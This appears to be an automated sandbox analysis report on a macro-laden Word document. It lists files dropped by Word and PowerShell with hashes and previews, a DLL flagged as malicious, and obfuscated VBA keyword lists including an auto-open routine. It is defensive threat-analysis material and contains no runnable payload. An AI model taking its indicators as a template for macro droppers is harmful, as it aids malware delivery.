                                                                                  Entropy (8bit):3.090852246460565
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:kK/kHbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:3v3kPlE99SNxAhUeo+aKt
                                                                                  MD5:50D0D81646007D121BB10197A04F2568
                                                                                  SHA1:6D1101CEBF9CA66509B5F05BD7D0B928B2A8046C
                                                                                  SHA-256:AA66FF4DFE143367ACF3074BB3E62FA91E93A3DB120CAEF271BFE45C0B906298
                                                                                  SHA-512:680E9D9F62480D7F9152FA9D1FAC2F90D67078C3BFA4D7BB24FEBBD66B30409ACC00A63CBF6280A0329BA7A37CA0DA91AE2D5CB38B1E2F4CDF8159C2550F3999
                                                                                  Malicious:false
                                                                                  Preview: p...... ........J.B2...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):252
                                                                                  Entropy (8bit):3.0139867481437155
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:kkFklopfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKvliBAIdQZV7eAYLit
                                                                                  MD5:4A553B4673A975575C21E908012C50B6
                                                                                  SHA1:DD2AE109A9692418370BA0272F4980C6B2035F72
                                                                                  SHA-256:59EFA5C2F092B938FC399A8F76B1E87D9D5B725D031D0C934117D1536507C30F
                                                                                  SHA-512:12A2ECCBBB48D6A7701656DCA73863956B19B62A9F520D89164FDFC4B5F8AC7E286B584D56F7F312627741C24AE50747F9E5B7F2AE4F0B917C9E26042A76A773
                                                                                  Malicious:false
                                                                                  Preview: p...... ....`....EcB2...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5D0E98E-EB6B-4CC4-8C38-663EBE143117}.tmp
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1024
                                                                                  Entropy (8bit):0.05390218305374581
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                  Malicious:false
                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E76C12E2-1DC6-41B5-9D5C-624688043260}.tmp
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1536
                                                                                  Entropy (8bit):1.3586208805849453
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb5:IiiiiiiiiifdLloZQc8++lsJe1MzK
                                                                                  MD5:D93BF21037A8573F01375E845807551D
                                                                                  SHA1:8388167AE066E652A440706479AECAB0C3AA9D5F
                                                                                  SHA-256:F605CB4F76D1C81882F32E6AE66CB8C247FADEF9308E54BF834E115B636040FB
                                                                                  SHA-512:0F7042A298A35EBFB77712350DF4487C8695A114DD490920ECB30427594E6CAFE03F3672A6CBAC24BCCF15ECAE779447145557582F5113FEB405620B627A4094
                                                                                  Malicious:false
                                                                                  Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\Cab6327.tmp
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                  Category:dropped
                                                                                  Size (bytes):59134
                                                                                  Entropy (8bit):7.995450161616763
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                  Malicious:false
                                                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                  C:\Users\user\AppData\Local\Temp\Tar6328.tmp
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):152788
                                                                                  Entropy (8bit):6.316654432555028
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                  MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                  SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                  SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                  SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                  Malicious:false
                                                                                  Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\68254_2001.LNK
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Thu Jan 28 03:58:37 2021, length=161792, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2028
                                                                                  Entropy (8bit):4.511322649165528
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:8ZK3/XTd6jFyZweGQifDv3qmdM7dD2ZK3/XTd6jFyZweGQifDv3qmdM7dV:8ZK3/XT0jFbZwmQh2ZK3/XT0jFbZwmQ/
                                                                                  MD5:DA843DAE0792463DF058369BF2772C48
                                                                                  SHA1:8822C09BB52188CC4185FBE60139B6D5E78D2702
                                                                                  SHA-256:BF2B56432AD82F3F665B4363F536962D656AEDF452AC72157FE46CAF4C4F256E
                                                                                  SHA-512:0CFE84C5EF06D2085A1FF5020F171EC43FD410BE02239EC6FF8F681CED8C174134F5E2E8CE5268D08873937C62DC80FF4825B6433A4FA486BF6F861977B61403
                                                                                  Malicious:false
                                                                                  Preview: L..................F.... ....B{..{...B{..{..h\"=2....x...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..x..<RS' .68254_~1.DOC..J.......Q.y.Q.y*...8.....................6.8.2.5.4._.2.0.0.1...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\258555\Users.user\Desktop\68254_2001.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.6.8.2.5.4._.2.0.0.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......258555..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):68
                                                                                  Entropy (8bit):4.182137201691816
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:M1TVE8VVSU+8VVSUmX1TVE8VVSUv:MrEHfEg
                                                                                  MD5:7A448E8832775114A878D9C8A27BBB10
                                                                                  SHA1:585D93A45B3316DFD3ACE93F0310EC71BF9D9248
                                                                                  SHA-256:C90D2B8FF5ED7BE037F2289BDFF34D2933BEB9597B08988BF987491869FAB8D5
                                                                                  SHA-512:1BC1360C9683344ADA95E7672CA87581B86308C24B4C986C10E5D1126D93C81AC2D20FB2FB3892E7DA4389A4ECC7850C894AF412FD735A578AA7E25E0F5328F2
                                                                                  Malicious:false
                                                                                  Preview: [doc]..68254_2001.LNK=0..68254_2001.LNK=0..[doc]..68254_2001.LNK=0..
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):162
                                                                                  Entropy (8bit):2.431160061181642
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                                  MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                                  SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                                  SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                                  SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                                  Malicious:false
                                                                                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VX1BP06RV53T455RIFFL.temp
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):8016
                                                                                  Entropy (8bit):3.582513289158673
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:chQCsMqLVqvsqvJCwo8z8hQCsMqLVqvsEHyqvJCworGzv1YL+Hzf8ObdlUVqIu:cy8o8z8yIHnorGzvBf8OnIu
                                                                                  MD5:729BF55BD7299345134D6ACCD2AEB731
                                                                                  SHA1:254FE3FD6E660E0461A1BE666BB348BD5A429601
                                                                                  SHA-256:92CBC9B2419E8D9427FE58A6D0E7622CAC367B8EB6EB6DC2C240F49756F51089
                                                                                  SHA-512:2CAA72557FA5DC620DE41F3A8FD7A6CFB47A44B525DCF3A6CF6C9341BFC8D6603E6777AF216CEBA612FA4F69FB82537E78BB54597F99A6B6A7356A5980598EB4
                                                                                  Malicious:false
                                                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                  C:\Users\user\Desktop\~$254_2001.doc
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):162
                                                                                  Entropy (8bit):2.431160061181642
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                                  MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                                  SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                                  SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                                  SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                                  Malicious:false
                                                                                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                                  C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:modified
                                                                                  Size (bytes):354648
                                                                                  Entropy (8bit):4.29030621772406
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:L82jpiC2JG7HZb7XWQml/jz8A4diTE90Q6kF4CKAYRkcj:I2L7HN7Kl/jLA90QECrYRpj
                                                                                  MD5:039810A34BE3DD45B9D30F89E18F46F4
                                                                                  SHA1:5F8609A2DB33D6BB70584E1741F428245474146F
                                                                                  SHA-256:A9DD98F4B6FE0B997F8B3D50F1CA405F02583A02133874FE123EAEA6C22DAB00
                                                                                  SHA-512:8ACA60103958AA461A91F708E0E41A401F316161DEFE9525560AC2E03AEA3566E01F0825410E678B0C76DA7551CE48C2200D01380810CF70AC75F9CC91BCF9FF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 86%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: ARCHIVOFile-20-012021.doc, Detection: malicious, Browse
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.`...........!...2.@..........P........P...............................................................................`..d....................T..X............................................................a..`............................text....6.......8.................. ..`.rdata..W....P.......<..............@..@.data........`.......>..............@....text4.......p.......B..............@....text8..d............H.............. ..@.text7..d............J.............. ..@.text6..d............L.............. ..@.text5..d............N.............. ..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:
                                                                                  Entropy (8bit):6.822315893177448
                                                                                  TrID:
                                                                                  • Microsoft Word document (32009/1) 79.99%
                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                                  File name:68254_2001.doc
                                                                                  File size:161280
                                                                                  MD5:72a3bbd36a5aa4c5249d1ec4766369b8
                                                                                  SHA1:68e23b96d389bd088e3c377555e5e88e239b536d
                                                                                  SHA256:8c425fd958630a27d8ad158e21c4fc627c6b594931da974faf655707d6e06ea2
                                                                                  SHA512:3227f179a351dad62babb17890e9bc75944b96d9c61fef25bab5d1a339427dc833e0ecd70efe564a30919803c47ebc117c0b8478a7e4573169bbe73ebbc71471
                                                                                  SSDEEP:3072:W6pFMWTdcrrXyQBsc0vWJVi4IrwVAPpwqLPF:W6pOvPIIAPm2P
                                                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                  File Icon

                                                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                                                  Static OLE Info

                                                                                  General

                                                                                  Document Type:OLE
                                                                                  Number of OLE Files:1

                                                                                  OLE File "68254_2001.doc"

                                                                                  Indicators

                                                                                  Has Summary Info:True
                                                                                  Application Name:unknown
                                                                                  Encrypted Document:False
                                                                                  Contains Word Document Stream:True
                                                                                  Contains Workbook/Book Stream:False
                                                                                  Contains PowerPoint Document Stream:False
                                                                                  Contains Visio Document Stream:False
                                                                                  Contains ObjectPool Stream:
                                                                                  Flash Objects Count:
                                                                                  Contains VBA Macros:True

                                                                                  Document Summary

                                                                                  Document Code Page:-535
                                                                                  Number of Lines:150
                                                                                  Number of Paragraphs:42
                                                                                  Thumbnail Scaling Desired:False
                                                                                  Company:
                                                                                  Contains Dirty Links:False
                                                                                  Shared Document:False
                                                                                  Changed Hyperlinks:False
                                                                                  Application Version:917504

                                                                                  Streams with VBA

                                                                                  VBA File Name: Gci_56o45gw, Stream Size: 1109
                                                                                  General
                                                                                  Stream Path:Macros/VBA/Gci_56o45gw
                                                                                  VBA File Name:Gci_56o45gw
                                                                                  Stream Size:1109
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 a8 cb 6d d6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                  VBA Code Keywords

                                                                                  Keyword
                                                                                  False
                                                                                  Private
                                                                                  VB_Exposed
                                                                                  Attribute
                                                                                  VB_Creatable
                                                                                  VB_Name
                                                                                  Document_open()
                                                                                  VB_PredeclaredId
                                                                                  VB_GlobalNameSpace
                                                                                  VB_Base
                                                                                  VB_Customizable
                                                                                  VB_TemplateDerived
                                                                                  VBA Code
                                                                                  VBA File Name: I_jtotl9qzr, Stream Size: 697
                                                                                  General
                                                                                  Stream Path:Macros/VBA/I_jtotl9qzr
                                                                                  VBA File Name:I_jtotl9qzr
                                                                                  Stream Size:697
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 a8 cb 68 14 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                  VBA Code Keywords

                                                                                  Keyword
                                                                                  Attribute
                                                                                  VB_Name
                                                                                  VBA Code
                                                                                  VBA File Name: Tuem7y_4cvap, Stream Size: 17499
                                                                                  General
                                                                                  Stream Path:Macros/VBA/Tuem7y_4cvap
                                                                                  VBA File Name:Tuem7y_4cvap
                                                                                  Stream Size:17499
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 a4 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff ac 05 00 00 9c 30 00 00 00 00 00 00 01 00 00 00 a8 cb d0 48 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                  VBA Code Keywords

                                                                                  Keyword
                                                                                  KbqQGKcAI
                                                                                  GfGjAzGeR
                                                                                  WXFEKIE
                                                                                  AhDZB.Range.ParagraphStyle
                                                                                  bqQxcLA.Range.Text
                                                                                  RiNMFj
                                                                                  oZBJQq.Range.ListFormat.ListString
                                                                                  InStr(JNfkj.Range.Text,
                                                                                  InStr(yZgdJvVP.Range.Text,
                                                                                  awNaP
                                                                                  OmJyG
                                                                                  JtPDWEB
                                                                                  vJkKCGAeq
                                                                                  ZXaEIG
                                                                                  jxnEAUKC
                                                                                  zKaCwWFDJ.Range.Text
                                                                                  FTtCoDc
                                                                                  ah_sg
                                                                                  CwagDCA
                                                                                  tbKDM.Range.ListFormat.ListString
                                                                                  hbAEBk
                                                                                  tzJksCBJB
                                                                                  lUqNfMjAH
                                                                                  NrYDKHEG
                                                                                  InStr(AhDZB.Range.Text,
                                                                                  eQUuFDru
                                                                                  NbelBt)
                                                                                  NbelBt:
                                                                                  WSWeHw
                                                                                  tlCMF.Range.Text
                                                                                  oZBJQq.Range.Text
                                                                                  AhDZB
                                                                                  oehBfBH
                                                                                  Left(zKaCwWFDJ.Range.ParagraphStyle,
                                                                                  vwBGxB
                                                                                  AdWGIbTH
                                                                                  jAVABQF
                                                                                  fjHRGQG
                                                                                  LCEyFiCH
                                                                                  OyrpGEGR
                                                                                  Len("xxx"))
                                                                                  oZBJQq
                                                                                  tlCMF
                                                                                  vVvxqHGrs
                                                                                  ah:wsg
                                                                                  nKoHLZB
                                                                                  NPyBQGAGX
                                                                                  bbhzkBgF
                                                                                  AOxzVepIB
                                                                                  NwftnNXBA
                                                                                  XxBDn
                                                                                  gemtRJp
                                                                                  eCzcG
                                                                                  JdFEHBDi
                                                                                  gjqnBy
                                                                                  Replace(saw,
                                                                                  qrLQOF
                                                                                  tlCMF.Range.ListFormat.ListString
                                                                                  ahpsg
                                                                                  KiGeQBpA
                                                                                  Left(bqQxcLA.Range.ParagraphStyle,
                                                                                  SCztLE
                                                                                  bvwPF
                                                                                  zKaCwWFDJ.Range.ParagraphStyle
                                                                                  JNfkj.Range.ListFormat.ListString
                                                                                  InStr(rsJLI.Range.Text,
                                                                                  vwBGxB.Range.Text
                                                                                  EYpZv
                                                                                  OGfYn
                                                                                  JNfkj.Range.ParagraphStyle
                                                                                  Left(rsJLI.Range.ParagraphStyle,
                                                                                  Left(JNfkj.Range.ParagraphStyle,
                                                                                  FbBzB
                                                                                  jAVABQF)
                                                                                  AyYHGdG
                                                                                  SymDGBcJj
                                                                                  LILWAWn
                                                                                  Left(yZgdJvVP.Range.ParagraphStyle,
                                                                                  tMzYO.Range.ListFormat.ListString
                                                                                  jAVABQF:
                                                                                  RTasDY
                                                                                  rsJLI.Range.ParagraphStyle
                                                                                  ZTFizFGF.Range.ListFormat.ListString
                                                                                  Left(SymDGBcJj.Range.ParagraphStyle,
                                                                                  lxSOEGF
                                                                                  fqOWEEXD
                                                                                  Resume
                                                                                  DOKqFG
                                                                                  tMzYO.Range.Text
                                                                                  NAYLFd
                                                                                  YWLTZylNX
                                                                                  rsJLI.Range.Text
                                                                                  AlCbBP
                                                                                  ERcyoJoAE.Range.Text
                                                                                  fmSIJH
                                                                                  hKGII
                                                                                  HvniGCa
                                                                                  "hqkwjbjdasd"
                                                                                  Left(vwBGxB.Range.ParagraphStyle,
                                                                                  RTasDY:
                                                                                  qIplW
                                                                                  dNESDo.Range.ParagraphStyle
                                                                                  RTasDY)
                                                                                  ZTFizFGF.Range.Text
                                                                                  yZgdJvVP
                                                                                  PBlWmzBI
                                                                                  QfPpIYDWH
                                                                                  vwBGxB.Range.ListFormat.ListString
                                                                                  NZgEl
                                                                                  cTCWAby
                                                                                  sWybazB
                                                                                  AhDZB.Range.Text
                                                                                  KKHJBcAYE
                                                                                  Vqihh)
                                                                                  Vqihh:
                                                                                  iLtsGUA
                                                                                  yHrsJGLG
                                                                                  InStr(tlCMF.Range.Text,
                                                                                  odRwCEQ.Range.ParagraphStyle
                                                                                  vevRJEC
                                                                                  lzgdCVJ
                                                                                  TXaZBF)
                                                                                  EhOCBCJ
                                                                                  okTyBh
                                                                                  WUJvDAEC
                                                                                  TXaZBF:
                                                                                  kCnsZK
                                                                                  tJdPJH
                                                                                  InStr(aTXZWf.Range.Text,
                                                                                  OxXuIIFB
                                                                                  HvniGCa:
                                                                                  HvniGCa)
                                                                                  drPyBCB
                                                                                  JNfkj
                                                                                  VoTfINbT
                                                                                  dNESDo.Range.Text
                                                                                  ahgmsg
                                                                                  VB_Name
                                                                                  TXaZBF
                                                                                  CZPcl
                                                                                  vwBGxB.Range.ParagraphStyle
                                                                                  oZBJQq.Range.ParagraphStyle
                                                                                  AhDZB.Range.ListFormat.ListString
                                                                                  ERcyoJoAE.Range.ParagraphStyle
